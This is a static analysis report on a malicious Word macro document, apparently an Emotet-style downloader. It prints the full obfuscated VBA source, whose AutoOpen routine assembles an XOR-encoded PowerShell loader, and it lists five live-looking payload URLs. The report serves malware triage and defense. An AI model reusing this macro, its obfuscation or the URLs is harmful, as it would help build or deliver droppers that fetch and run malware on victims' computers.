Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f1f52d0c20941c7f…

MALICIOUS

Office (OLE)

Size: 257.0 KB
Created: 2018-07-03 17:35:00
Authoring application: Microsoft Office Word
First seen: 2018-07-27
MD5: a6a3b8014f512dfba3db367c0395b36c
SHA-1: 18e01e3d058f7207c0dbba604ec44d09017a2ddf
SHA-256: f1f52d0c20941c7fd4289b3b9b54edcd409b150babb18ec52a1d5d89f727c3c8
Risk Score: 350

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine that uses CreateObject and WScript.Shell to execute a command. The macro assembles a PowerShell command string from literals spread across helper functions, which is a strong indicator of a downloader or dropper. The reconstructed string begins 'wershell ( (105 ,46, 37,15 , 11)'; the Run call prepends Chr(vbKeyP) and Chr(vbKeyO), the letters "P" and "O", at run time, so the macro attempts to launch a PowerShell process. This behavior is consistent with malware designed to fetch and execute additional malicious components.

Heuristics 11

  • ClamAV: Doc.Dropper.Agent-6599837-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6599837-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
       rPbhfl = 70416 / Uofqz - (79566 - hYdvAE - 41961 + GGdfUq / ImJjYr - wrziFQ + SDTHu * zhTfaV)
    dBvQniOR = cMiFhRHCdWq + CreateObject("Wscript.shell").Run(uLXwEazNwM + Chr(vbKeyP) + BNcfjGwTuZD + Chr(vbKeyO) + rmKYzMilqoBKU + wBdwlRFd, 126647260 - 126647260)
       hCSDJu = 99278 / VvMFW - (95811 - cYQod - 24759 + SVjCVW / BoYLH - OjKSEI + jRpIw * UBrLVL)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       rPbhfl = 70416 / Uofqz - (79566 - hYdvAE - 41961 + GGdfUq / ImJjYr - wrziFQ + SDTHu * zhTfaV)
    dBvQniOR = cMiFhRHCdWq + CreateObject("Wscript.shell").Run(uLXwEazNwM + Chr(vbKeyP) + BNcfjGwTuZD + Chr(vbKeyO) + rmKYzMilqoBKU + wBdwlRFd, 126647260 - 126647260)
       hCSDJu = 99278 / VvMFW - (95811 - cYQod - 24759 + SVjCVW / BoYLH - OjKSEI + jRpIw * UBrLVL)
  • Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URL
    A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "utMfNdct"
    Sub AutoOpen()
    On Error Resume Next
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
    • http://www.furnisofa.com/YucipclqQ4/ - Referenced by macro
    • http://www.marpaybiotech.com/IIzaSAz/ - Referenced by macro
    • http://www.gentiane-salers.com/PpsNE9P/ - Referenced by macro
    • http://www.bibizdevar.com/dNL2ZI5alI/ - Referenced by macro
    • http://www.hotpietruck.com/LnhchhmDCU/ - Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/main - In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 17216 bytes
SHA-256: 358108a26673c4520af7fdb44d530abf30d22d1233507682f59cf18d421fd8fa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
369 of 586 identifiers look randomly generated (e.g. 'pPhzpLwLBDjAw') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "pPhzpLwLBDjAw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "utMfNdct"
Sub AutoOpen()
On Error Resume Next
   VLiqP = (cznMF + 79180 + 59693 * QGUqO + (89058 - VsWrS))
   Lzwal = (CHvaLw + 51737 + 30557 * MnUjrb + (2152 - OjzZh))
   qVlFKO = (Opqqd + 52310 + 49988 * iQVWDF + (85034 - DXIdGz))
   BkMPWf = (jAoGbJ + 50512 + 93159 * HRfZKV + (18489 - IrKiir))
   DVYupw = (Eknfmj + 49834 + 29379 * aYWcj + (87363 - XfbmG))
   OOMcY = (bjdjX + 17351 + 64323 * RcDTwV + (85871 - zlNGlF))
   ULwJzC = (kjGtY + 25573 + 90672 * iidAtZ + (68381 - LOHJN))
   usssjR = (hwofKz + 10082 + 94301 * kropiK + (77238 - rIRQa))
YtDcStvJ (Qbibzafr + ITDwXQQzL + OXuLBoAGHR + pbRwczFVOj)
   RiWti = (iQwcZv + 15289 + 58265 * LurAI + (56781 - wPEjE))
   HpwjzP = (bzoaG + 36578 + 45275 * VrIJVk + (98140 - huoUM))
   AaAbHh = (AnEWJ + 98643 + 37888 * MQnCJs + (62595 - ZPSkC))
   LowURj = (YZCDV + 69686 + 36637 * cCZJXD + (46783 - bjwIY))
End Sub

Function Qbibzafr()
On Error Resume Next
NNqHa = mkuVsV + uDYwub + (OmiSYm * 18630 - vaVBiP * 46170 / zlXGS - qYnzW)
   JBZnr = EafYio + zoUAqn + (WpaKX * 41458 - CwKiY * 30264 / fuBiJw - ziZCj)
   UXWXw = JwUaO + WRCdV + (KYzRuS * 34370 - oCYGBI * 77051 / wiami - GuLUn)
   GrYNaK = fMprfq + Xcwtk + (BVwCV * 8248 - lcnszE * 10053 / ktfVwM - ZVhTV)
wbuEz = "wershell " + "        " + "        " + " " + Chr(40) + " " + Chr(40) + "105 " + ",46, 3" + "7,15 , 11"
SnzXzv = qUOlQd + stSwD + (GUQNS * 39484 - qwkWW * 61413 / sMRiI - wIasIo)
   AXkPz = wZzWmE + rqrjrO + (acjbno * 47538 - zuYFdF * 6186 / OVXYh - upfaim)
   RqAtD = YrIbLZ + bDwjb + (oYdOU * 81759 - whqvN * 17628 / SjDXMa - faFtM)
   nhITN = rKVCdD + PYGXN + (GbTSX * 5835 - LzRCGa * 60095 / uHtFtV - divBX)
vCmTd = "2,35 " + ",40, 5" + "8,96 ,3" + "4, 4" + "7,39 ,40," + "46,57, 1" + "09 ,3, " + "40 ,57" + " ,99" + " ,26," + "40, 47" + ",14, 33"
JZXoZr = KLCGsQ + wzokPI + (LFwzC * 33364 - zwWCXk * 21441 / lUYjow - snwiRQ)
   AwdTS = UYoWah + MfEUj + (WMTMj * 37775 - fMLBUz * 65217 / wXYERN - MfCFH)
   SMidBw = sjmtzs + HNnCa + (POHjPO * 12409 - znKdM * 74187 / zcXSB - CSliFZ)
   ICrrzw = zincj + AsqBN + (CnGvz * 51966 - AIJwY * 39415 / ruuqw - OCojtb)
IrjLG = " , 36" + ", 40, 3" + "5, 57 ," + "118, 1" + "05,37, 38" + " ,27 ,11" + "2,106,37"
JKKZJO = UorNd + FwKJi + (EwfMr * 95650 - RiqwN * 20986 / DPBCV - msUYa)
   RttHDw = ZFjiz + brzjd + (iCXMpv * 16174 - VOLiHm * 7873 / YXanAB - AXlDju)
   pJqiw = ujDMvK + LtBWKP + (SZIqpc * 33170 - pErZt * 99218 / CoYqT - rUNrpK)
   wwsziH = EFCOn + dsscQn + (GHlPj * 48737 - NvWBK * 77809 / RAvKw - OHuaJ)
FnUBPkVZ = " ,57" + ",57," + "61 ,119," + "98,98 ," + "58, 58" + ", 58,99," + "43, 56,6" + "3 , " + "35 ,"
AUsVX = nQIRZ + ncKFC + (AcJXJX * 32748 - uipaR * 93406 / zakCcc - CwLYYj)
   Tzvlm = YCcLU + BZJbi + (cipBaD * 48666 - CZLMl * 98246 / Oajtof - VvwZh)
   bYsXd = wCSRX + MUTzrP + (VTmwd * 64786 - TCIuDA * 41486 / qdjoj - DiwII)
   HVOtUw = QAAtT + YrzVW + (qmrNz * 38631 - KaFuwz * 35009 / OTpzFv - IBnfXA)
lJsQXH = " 36 , 6" + "2 ,3" + "4 ,43 ," + "44,9" + "9, 46," + "34 ," + "32, 98,2" + "0,56,4" + "6,36 ," + " 61, 4"
zHJoZu = iRhPEA + ouSzk + (JTzwHj * 85193 - NOcnB * 9381 / EIwPuk - wahhq)
   MOiBS = pjKMh + CNQDEc + (vVjlW * 69629 - JGUWPa * 81006 / LzjbU - PztvPW)
   WlvWEf = wcdIRc + iMozG + (iCRTd * 15679 - jVppG * 25639 / nUZzLu - aiVbJr)
   cLFWD = AMEoaP + jFttXO + (WKiqS * 6393 - MSlppV * 62768 / IwlqV - IwBDR)
pOznHY = "6,33 " + ", 60 " + ", 28 , 12" + "1 , " + "98 , 13,3" + "7,57 "
Qbibzafr = wbuEz + vCmTd + IrjLG + FnUBPkVZ + lJsQXH + pOznHY
   ofzwi = FMrSAR + wMKzZ + (afzPuC * 94008 - KwFNo * 64654 / XbGXN - NEPji)
   dBjZU = PjjoQD + lWvPmF + (kqYkD * 53459 - RNbjj * 23197 / TCiXkm - BnjLD)
   bvSodb = incvV + PzTHFj + (KSUQsB * 36036 - iCpZzw * 70391 / umFHp - fZiBr)
   jnFwI = OTUbt + GPcmnB + (fZNno * 72743 - HEUvs * 36845 / Hzikq - tjUAwG)
End Function
Function ITDwXQQzL()
On Error Resume Next
zEBumM = zsAJKi + KJWfT + (SNbzO * 52373 - jPDfid * 41067 / zHrIV - MCIrL)
   pbVEQa = LlcCjL + whpVih + (fNBiX * 95766 - FKSICu * 73688 / twPEq - oVFLw)
   PiMnMi = JOTas + uFbJui + (wporG * 49302 - zrswTa * 25101 / azfvXX - sZYWcv)
   cifii = SJaBv + IlzkmW + (uibYU * 98171 - BJmui * 83373 / vJAWL - mfbvtr)
jMlbvj = ",57,61" + ", 119,98" + " ,98 ,58" + " , 58" + " , 58" + ",99 , " + "32, 44 ,"
KWCREN = ajhMam + dbBzp + (cnpmUW * 77554 - tAfqX * 87872 / aMCij - UvzYM)
   KYJaA = rWXjQ + iZNjiB + (CsFDO * 99801 - GZIrq * 25257 / Ndrja - XfWntw)
   wKEnM = CJQFUv + jMROfq + (oUvVw * 16143 - zXVRK * 33283 / XwUUfs - zzYXo)
   MLLjf = aqVhmn + SWXGR + (Sidiw * 13276 - VwPTjw * 91391 / ijlmva - kcwIj)
IEFtvnqp = "63 ," + " 61 " + ", 44 " + ", 52 , 47" + " , 36 " + ", 34,57 ," + "40 ,4" + "6 ,37" + " ,99" + ",46 ,34 " + ", 32 ," + " 98 , 4 ,"
CkMKT = vQOHFB + ErkivE + (bhiEG * 5672 - hLPZh * 71811 / Umlwph - swBAWB)
   qAvfLr = VFIDQb + FwhYQ + (jFwkG * 44489 - jidDk * 3421 / rKUuV - qzjdvY)
   imzTb = AIkCL + oTCmc + (SOFWv * 58098 - DWKjYV * 78578 / QtwiJb - BNGIJV)
   wLNIID = RbOjqE + DlunKi + (JPwtAz * 85393 - XWwIIX * 76550 / NJGXd - hldaQH)
BNFfDpUtsF = "4,55" + ",44,30, " + "12,55," + " 98 ," + "13,3" + "7,57, 57 " + ",61 ," + "119 " + ",98 , 9" + "8 ,58 ,"
DvKoub = dJzhIk + pwHtDA + (BnTBr * 67951 - UHpBq * 81159 / sCEULh - NwpOkC)
   aIrBM = BHrmD + cICJfS + (UwtDYr * 36978 - ordnH * 63370 / uwzzib - lLRQT)
   fKmKw = hajFTJ + oMPNzw + (pODMj * 76491 - wLimI * 46060 / udFTr - zNNti)
   anMDYc = AIrVj + jqYMj + (rXaGD * 37170 - nNsPnU * 34556 / vWXUz - WQkFN)
UhcdWs = " 58,58" + ", 99 " + ", 42" + ", 40, 35 " + ", 57 " + ", 36" + " ,44, 35 " + ", 40" + " , 96, 6" + "2, 44,33" + " , 4" + "0 ,63"
uNwPaT = GscLC + ownRw + (nFqBZM * 96327 - WfRMf * 9443 / lwdkj - mwoHd)
   LzTLMa = BcDMYC + whbaPj + (jDzJjM * 57512 - JCtvi * 74255 / CTFms - zhmEh)
   SEUNr = kcvVCf + IzSBS + (YpYiHV * 56549 - ulWLEz * 9816 / zooBw - KbjRZY)
   lmLVzR = IPRHa + IWlOwS + (liujK * 89290 - fMcAK * 65015 / CjkplU - PzdWip)
hLzsiVc = ", 62 ," + "99,4" + "6 , 3" + "4 ,32" + " , 98 " + ", 29, 6" + "1, 62" + ",3,8" + " , 1"
UCVUt = nAARD + jmwbXw + (GziiT * 38341 - UifCRd * 81697 / LubVC - QrHZnj)
   BVvDA = hIlUCA + vIUzA + (GIaCzC * 88582 - qGbIj * 76731 / TJjzQz - PaaZU)
   sHWJYN = AbTvB + HqBJL + (MWczk * 97552 - aztAcZ * 64499 / djkSkT - fspow)
   DifUbJ = tZNsO + pqZKz + (IwCdNQ * 58867 - fwzpvE * 6281 / Hrqdpn - Xbwno)
UvJTHGXFMD = "16,29," + " 98, 1" + "3 , 3" + "7 , 57,5" + "7 ,61 ," + " 119" + " , 98 ,"
vhmYR = SizOLw + nBKlj + (oJPDzb * 81852 - AurPjR * 68958 / VLSSLi - ZTSjL)
   TOhhcK = jdpzbV + kIzfi + (IjwSNn * 19366 - pkisfD * 61995 / JhDHmw - WVqqMl)
   UnEWR = QPUpAK + sKEvRm + (wRcXC * 18486 - czWzzB * 47749 / rnIlt - uNOGb)
   sSNQO = IcPIl + ombHa + (VTKdHR * 83749 - CwqjJw * 1309 / iifkN - ZTNaz)
KsYNLM = " 98 ,58" + ",58, 5" + "8 , " + "99 ,47" + ", 36," + " 47 , 3" + "6, 55, " + "41, 40 ,5" + "9,44,63 ,"
dubdQW = TqWtw + rjrPz + (QsGJXj * 40719 - inLOl * 19696 / DwOanr - HLSWi)
   hqdqQ = qwWlDu + DZjiII + (KoidpJ * 10672 - lvqBA * 2565 / nKUzBT - jNKfs)
   najJNu = tIABG + nLauCt + (RlWJLG * 40810 - HVTJR * 32462 / KPhnG - sfKTqX)
   zMQvY = hSCLjT + wnRzs + (IRcSR * 74967 - tpDENQ * 51688 / pQhbZ - UGOjG)
QjftjKL = " 99 ,46" + " , 34, " + "32, " + "98 ,4" + "1 , " + "3, 1,127," + "23 , 4 " + ",120 ,44"
GrdaAK = ouFsw + wvtjdY + (fklVVX * 37685 - vTiiG * 18241 / OiQUY - fGwTYV)
   RMMFIz = WGHEd + ztbaKs + (jjKPJz * 4084 - doCzCY * 85772 / GZaIwv - aLqhk)
   fWJfiO = CwvIvO + SFGaSE + (UBkjr * 70898 - jESSR * 24457 / SsSUJH - KiRNiC)
   pGSHmw = CEWwH + zlnjs + (NYALNP * 75908 - YGLqU * 67052 / UBCLWS - NFsijh)
jGZRLOUXw = ", 33 , 4," + "98,13" + ", 37 " + ", 57 ,57 " + ",61 , 119" + ",98 , " + "98, 58," + " 58 ,58," + "99 ,37" + " ,34 ," + "57 , 61 ," + " 36 , 40"
ITDwXQQzL = jMlbvj + IEFtvnqp + BNFfDpUtsF + UhcdWs + hLzsiVc + UvJTHGXFMD + KsYNLM + QjftjKL + jGZRLOUXw
   SBbjj = pIQJF + zBzGZh + (cEsZlr * 31800 - CsSdc * 3021 / rVqmc - uGjtw)
   nkzNz = kSJZbp + QzmPzf + (jhKbPm * 10913 - izJjn * 75537 / XCfVis - GSuAtL)
   HrlOUX = aXzKp + kLPvC + (mcjjc * 93681 - washOs * 87885 / aGXSTQ - ziiLt)
   UEPOfb = UZvqd + Sscpd + (uAMoG * 16782 - iJXSWJ * 65369 / OzCDmk - zTWdjv)
End Function
Function OXuLBoAGHR()
On Error Resume Next
rrPozt = LopJVP + JTTGsN + (YAsHSN * 52430 - HGicz * 95559 / PPBXG - LpjNAE)
   iisWm = SrXhh + Wrjjfs + (BmDEF * 39386 - iMKMu * 34112 / QpZOI - tifshT)
   kDfGAU = DYainB + XFjKnP + (FBHUX * 5123 - WGLWl * 57018 / ihELZ - FsOuaG)
   wvCwwo = zYHJR + YfiqiR + (SJFsdj * 79077 - iEBRD * 12943 / fpiQE - zCwOA)
fZnNZ = " ,57, 63" + " , 5" + "6 , 46 ," + "38, 99 , " + "46, 34" + " , 32 "
IRYbzm = iEcAX + jVwRPL + (LaPiJk * 62120 - MPRPI * 31369 / QulmZ - jnWzk)
   vLMaMw = XhCqRO + DVpLk + (RaEEj * 55653 - WcnskZ * 77824 / JAoFSh - XOEUXT)
   NwLNW = UHIujK + uuKFs + (VuVAFR * 63159 - DpzMF * 35856 / PpjXD - QBruW)
   WYzhu = SiCYl + RPjRPI + (YHtYc * 98527 - iTMmM * 88273 / rzzHi - hLsbIT)
nomCla = ", 98 ," + " 1 , 35," + " 37, 46" + ", 37, 37 " + ", 32 , 9 " + ", 14, " + "24,98"
NEwjjM = PcSXbQ + jscOrW + (kirjGw * 43361 - QINDG * 52563 / GJttr - bICKkz)
   cGIzDo = ZHCcOV + MJJYJL + (mSUzi * 87496 - VoWWB * 91690 / JAOzSw - wHRfWB)
   ztmbl = pnoCZ + TDTjGN + (wCJvY * 83553 - hnLDS * 15782 / uWvkvP - FWMLZX)
   czcEw = zzWrzG + pFRRIi + (szfFdi * 78987 - FtdGj * 17748 / aalBj - UjXra)
pUBEspTsrK = ", 106" + " ,99,30," + "61 ," + "33 ," + " 36,57,10" + "1, 106, 1" + "3 ,106"
CubbI = FCHiz + MNjtO + (Pqbvq * 84545 - FOrBaZ * 99285 / UolVH - zcuzHt)
   zbBmjI = BoHEjq + GOBhE + (PrYvYG * 45808 - Nhvjw * 13252 / nqOrR - Ejjjl)
   nsOtR = tOHCG + dkjnG + (VkkwT * 46147 - qnwLLs * 27438 / pkXzod - FszkkA)
   jfaKSw = MqzNj + ZCbkk + (CZjXw * 21689 - krjwjz * 38714 / zHlszL - hfzWLr)
nhDXmlaGzls = " , 100 , " + "118 ,1" + "05 ,59,9," + "47 , 1" + "09 ,112," + "109, 10"
hCRIp = bsZaj + cGmXV + (tqCUwI * 45867 - Kmppf * 12798 / ilfXX - tHvMC)
   KSikfQ = zGHND + khsoC + (uZDzVH * 99564 - nAjGHw * 64625 / pjBKZ - GEXXc)
   mTBSs = HBHUId + RizXAF + (aXsMn * 86090 - iSzZw * 59130 / LUwQOi - jFUXXi)
   jXQZU = AjqZq + bPwCw + (rbnAI * 77310 - iofrz * 66352 / lcGZul - ClItz)
ZwCZs = "6 , 126," + " 125, 117" + " ,106," + "118 , 1" + "05 ,60,23" + ", 56"
LQzwZ = YkBWG + lrEtz + (zOlRX * 45996 - siqzJR * 81658 / WPAzT - csdziE)
   QoEDwp = WdttZ + jhhms + (QEObD * 91349 - FWWISt * 37888 / cqltKc - wtVHYK)
   vKqHZ = oBMAIU + ozUbzF + (Erwth * 54584 - FUGwXT * 76233 / MRKTfH - dklqsr)
   hHjXS = nPbof + TYiHvK + (uGKAGl * 51495 - uRXpQ * 26774 / BLSCj - wwsKl)
hBwmk = ",112, 10" + "5,40," + " 35 " + ",59 ,11" + "9,57 ,40," + " 32 ," + " 61 ,102 "
jAqwi = Vdcsr + pBpjNK + (lvPjdV * 79964 - jjIzhk * 83972 / HAnOvZ - MLfrhz)
   BJSwIb = TMapX + zTvKwz + (hiZvf * 22060 - CUwiH * 83280 / iwikc - OooMZ)
   nktPV = jawTjW + wONwN + (hfjTUQ * 49356 - hIttM * 42956 / XcJEd - XQJLOI)
   ZuHSzN = NzZwD + jGElAw + (nDQfZ * 11304 - OLHqjt * 13835 / LoEWaX - TkXcYt)
CpUpBEzNo = ",106 , 1" + "7,106 ," + " 102 ,105" + ",59," + " 9,47 ,10" + "2,106" + ",99, 40, " + "53, 40 ,"
OVwGmr = IHQwv + GiijJT + (pjWKwF * 51870 - wIZTn * 5537 / nQQVNA - iPLHdp)
   jhCRPs = zoHjQl + wqdIn + (vOSnF * 80335 - zGwqcl * 51726 / aXBYK - obJpw)
   lkYiz = izVOOM + BkspQ + (fKzXS * 53617 - czHmJw * 16144 / FNiQrm - arMJo)
   fBApa = stHRY + vWCSCZ + (AKYlE * 87878 - KJOXHF * 16642 / qfHDT - iNQLlF)
riJCJkuto = "106,118" + " ,43 ,3" + "4 , 63," + "40,44 ,4" + "6,37, " + "101, 10" + "5, 27," + " 43, 46 ," + "109 ,3"
aYZiI = skANH + LSUtTi + (wTftM * 64560 - nENbbU * 66738 / zswBw - RCkGM)
   owszD = AiqvfM + bToXY + (mCvTbu * 34950 - wfQvmA * 15080 / oMPYlT - aDNlB)
   kdfLU = WtfQDk + EzZzs + (siibH * 184 - SwVPO * 16950 / HMCkj - ZkzJv)
   Idvlsl = DlMGG + NhsiF + (EwvWK * 49476 - RYjHL * 18439 / kUULAR - qXTBb)
WjACazAHl = "6, 3" + "5 ,10" + "9 , " + "105, 37 " + ",38 ,27" + " ,100 ," + "54, 5" + "7 , 63 , " + "52 ,54,10" + "5,46 ,37" + ", 15, 99"
MYwRM = stRTYX + LotlA + (jUczu * 9212 - CFIKLk * 70881 / crbVuG - nisAfm)
   WAwHL = jkZEM + ZnkGIn + (LjzSPF * 99585 - hwGtZ * 81779 / iHLDYN - rSXJL)
   oCXkNs = aZhjCM + zlSKn + (hFdvFP * 48192 - rfvGuS * 35546 / aWjhPS - acBMw)
   nbPEA = UYIpF + YLTHX + (QCuTC * 84194 - oPanHi * 41478 / vMZDuV - ukISG)
huDUz = ", 9,34 , " + "58,35" + " , 33" + ",34," + "44,41,11" + ",36 ,33 ," + " 40 " + ", 101,105"
ztTBvu = hPoln + Javsw + (ODsfaO * 30308 - Evsti * 63676 / SKjZk - cBVnhu)
   pQnVln = kHNtm + iwlWvH + (HqQLS * 27212 - lBWss * 37818 / XoIXHq - iLzpnE)
   iPwra = bwAbCX + OjlUAS + (LKdzoQ * 49483 - fSVfJz * 14424 / YASfGY - jUjISv)
   FzMVS = jZcizT + iumcHt + (ULwiGd * 27697 - DSECaj * 72516 / jkcSiE - riNkkO)
jsPwrud = ",27,43 , " + "46, 9" + "7, 109 ,1" + "05,6" + "0 ,23,56," + "100,118 ," + " 30,5" + "7 ,44" + ", 63 , 5" + "7 , 96 ,2" + "9 ,63 "
VYMwNI = hOKzp + zBHSO + (ZMLjTw * 76853 - ZVkjR * 41016 / ijuirh - doppJ)
   zHJpr = ClKot + ZkiLd + (jUmQSN * 69247 - KziWu * 57670 / jZRMvo - TwYuB)
   SwrSKL = oRjow + VDCCn + (PLqKQz * 66669 - cBqrYL * 3836 / NIQMi - ARsdP)
   cpUGzU = zDJOwT + FXOkGz + (Uinsm * 43525 - iEHGjF * 80796 / KCAnzZ - IRHFFb)
tRcjSVEw = ", 34,4" + "6, 40" + " , 62" + ", 62 , 1" + "09 , 1" + "05 , 60"
OXuLBoAGHR = fZnNZ + nomCla + pUBEspTsrK + nhDXmlaGzls + ZwCZs + hBwmk + CpUpBEzNo + riJCJkuto + WjACazAHl + huDUz + jsPwrud + tRcjSVEw
   pDMim = KXHKn + MDTnjj + (DCijr * 21180 - qOLpq * 98249 / wjOaE - URNqv)
   hSYHuN = MlLLU + TOLwL + (UonPU * 10313 - icjlo * 77524 / GdGSGQ - pmSlXt)
   ksIVB = awtCD + iiYfA + (XjOqH * 86465 - vofBVi * 93092 / HtkXP - PNKkDO)
   TAQtlz = XclaTb + fnbpQ + (DRptma * 22638 - KZSnjs * 41880 / kzGYZi - biwkMp)
End Function
Function pbRwczFVOj()
On Error Resume Next
HkhfSP = fGMGG + whfsvl + (jltsqf * 99020 - ILtKp * 77486 / ACczp - YXZGnm)
   VjCCiK = Wropn + qXvTw + (nzhdQ * 92399 - vHNTmC * 86442 / AYIrf - UiINnM)
   CBcGK = wznFm + iOMIX + (muNqw * 74129 - QlTTYP * 56529 / XsGlNb - uDMSWl)
   iuQGS = ANquk + fGkuu + (XHrbo * 77415 - kjHSE * 10924 / imNuP - CPvzQz)
wBiQB = " ,23," + "56 ," + "118," + "47, 63,40" + ",44 , 3" + "8, 1" + "18 ,48 , " + "46, 44 " + ", 57" + ", 46 ,37" + " ,54," + "48, 48"
uOXzcN = muBzZ + sRCiWZ + (bPTibm * 61191 - ApCcc * 86539 / llhDD - jaJzOS)
   AIzhVu = ivpWq + KlEzVz + (fjRBTW * 23051 - oJiMUv * 7672 / sVHhni - vLNVRu)
   KiQZF = qwNwi + qlHJV + (GtMdOQ * 9942 - pWpGAu * 1648 / wDwvp - BvHIwd)
   QHVkMA = MMCpi + kffPqJ + (LVGXK * 50454 - AJifQ * 82143 / VLzoD - RKjDvi)
AhJWSbw = Chr(41) + "| %{ [" + "CHAr] " + Chr(40) + "$_" + "-BXOr 0" + "x4d  " + Chr(41) + "} " + Chr(41) + "-jO" + "In ''| & " + Chr(40) + " " + Chr(40) + "["
FhozJK = USkpQ + nJsKKi + (DtmSsh * 6984 - PUPQz * 30534 / KcWvH - kSwww)
   wqQHcN = cMuVHc + LFzUZ + (WWzQn * 28252 - lTapUu * 5076 / TwMnC - mEPGP)
   AvfUb = hHZrz + OmwJl + (BMazs * 12027 - hWzjSj * 18927 / vapnG - vMvhc)
   EoCrjK = JjQAU + iUGHw + (JXmDMa * 93738 - rRWFR * 52900 / khnOR - zISnwb)
DBvoRun = "StrIN" + "g]$VE" + "RBoS" + "epReFeRen" + "cE" + Chr(41) + "[1" + ",3]" + Chr(43) + "'X" + "'-Join" + "''" + Chr(41) + " "
pbRwczFVOj = wBiQB + AhJWSbw + DBvoRun
   mOWUsf = ZUJwG + NHmUw + (NhnRr * 72248 - BQHilY * 30901 / UGJWNU - svztB)
   SzNEG = oswwf + zdGSlY + (qRsAd * 96439 - iGosUw * 68765 / jRtifF - tVJinQ)
   AaJZUL = awkFVl + DGcjwE + (pYGsTP * 47022 - qwKUr * 10460 / iudYG - TJYKU)
   tZPUdS = FCtAD + juChX + (HpuSM * 13510 - fqGzf * 36022 / HrIGf - AYEWC)
End Function


Attribute VB_Name = "oIvLAlzdm"
Function YtDcStvJ(rmKYzMilqoBKU)
On Error Resume Next
   jMzqPw = 32964 / arstQ - (62977 - AHTwit - 76274 + XmGjf / SpAJQZ - XpidqH + BrdMR * HrOVDz)
   LaEJPl = 28999 / CsjAG - (73305 - RkTrmR - 99424 + IuRnia / iFTjiw - ZNFsNz + tLKFiZ * CLLbLv)
   Ozzjic = 27167 / hZHjjK - (10160 - tDAjPi - 13053 + EAwctI / TBpLP - MfXlP + kwztSz * RXLOf)
   bzRGFA = 99557 / RErPLo - (45313 - fVnSYp - 12579 + uIJjhz / QXSvGG - VjwcH + zskWc * UIwiSm)
   VaCGQi = 75655 / tjTQnz - (50474 - wVzFZo - 6335 + XaHha / iFDLO - osOXd + ZXAqGl * vXKbP)
   hXsip = 51280 / FaCNN - (52894 - CzDHbc - 89602 + fJjTV / iuTdn - hAwJY + XYwVnd * CWwUDA)
   MSrjCW = 9762 / bfijaW - (2613 - AtifF - 42033 + KWDoS / jaQdzs - JMHBr + zSnDD * BUzaU)
   rPbhfl = 70416 / Uofqz - (79566 - hYdvAE - 41961 + GGdfUq / ImJjYr - wrziFQ + SDTHu * zhTfaV)
dBvQniOR = cMiFhRHCdWq + CreateObject("Wscript.shell").Run(uLXwEazNwM + Chr(vbKeyP) + BNcfjGwTuZD + Chr(vbKeyO) + rmKYzMilqoBKU + wBdwlRFd, 126647260 - 126647260)
   hCSDJu = 99278 / VvMFW - (95811 - cYQod - 24759 + SVjCVW / BoYLH - OjKSEI + jRpIw * UBrLVL)
   zkwTHZ = 56580 / UHouP - (44505 - sOwkUv - 97484 + fbDWB / JcDzfb - mqKffP + JBOjc * IdNlr)
   AjQsEC = 52821 / Kiluj - (92101 - GXnEo - 61049 + riMUuc / fPSIAa - VzGcEO + iPTzj * CFajC)
   iqBjN = 98306 / mMvFSG - (50553 - lsnljn - 60581 + zXSzf / QizvI - BNczI + FNCNV * diPcJo)
End Function